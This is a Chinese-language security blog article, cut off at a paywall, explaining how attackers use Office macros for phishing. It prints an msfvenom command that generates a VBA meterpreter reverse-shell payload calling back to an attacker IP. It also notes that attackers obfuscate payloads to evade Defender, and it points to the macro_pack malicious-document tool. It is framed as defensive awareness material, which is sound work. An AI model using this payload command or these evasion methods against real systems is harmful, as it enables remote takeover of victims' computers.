在企业安全实践中,钓鱼攻击依然是最常见、最有效的初始入侵方式之一。攻击者往往不会直接在邮件中附带可执行文件,因为这类文件通常会被邮件系统或杀毒软件直接拦截。近年来,利用 Office 宏(特别是 Excel / Word 宏) 的钓鱼方式成为主流。本篇文章将通过一个典型攻击链的实例,解析攻击者如何构造恶意宏、如何与远程控制工具协作,并分析企业在这一链路上的安全风险与防御手段。
注意:本文所有内容仅用于防御研究及提高安全意识,禁止用于任何未授权环境。
一、攻击者如何借助宏创建 Payload
现代攻击者常借助漏洞利用框架(如 Metasploit)生成用于被控端执行的 payload。例如,通过 msfvenom 生成 PowerShell 格式的 VBA 代码:
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.10.0.97 LPORT=8080 -f vba-psh \
-o vba-psh-msfvenom.txt
执行后会输出 VBA 版的 PowerShell 命令,其最终目的是让打开文档的受害者机器主动连接回攻击者。
然而,微软 Defender 对于此类典型的 Metasploit 生成代码已有充分识别能力,因此攻击者常借助编码、混淆或其他规避模块尝试绕过检测。
二、macro_pack:另一种常见的恶意宏生成工具
除了直接生成 VBA 代码,攻击者也常使用 macro_pack 工具。macro_pack 是一个开源工具,可从 GitHub 获取:
https://github.com/sevagas/macro_pack
它支持在 Windows 上直接制作嵌入恶意宏的 Office 文档。安装后可通过以下方式查看帮助:
macro_pack.exe -h
最低0.47元/天 解锁文章
扫一扫
3771
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
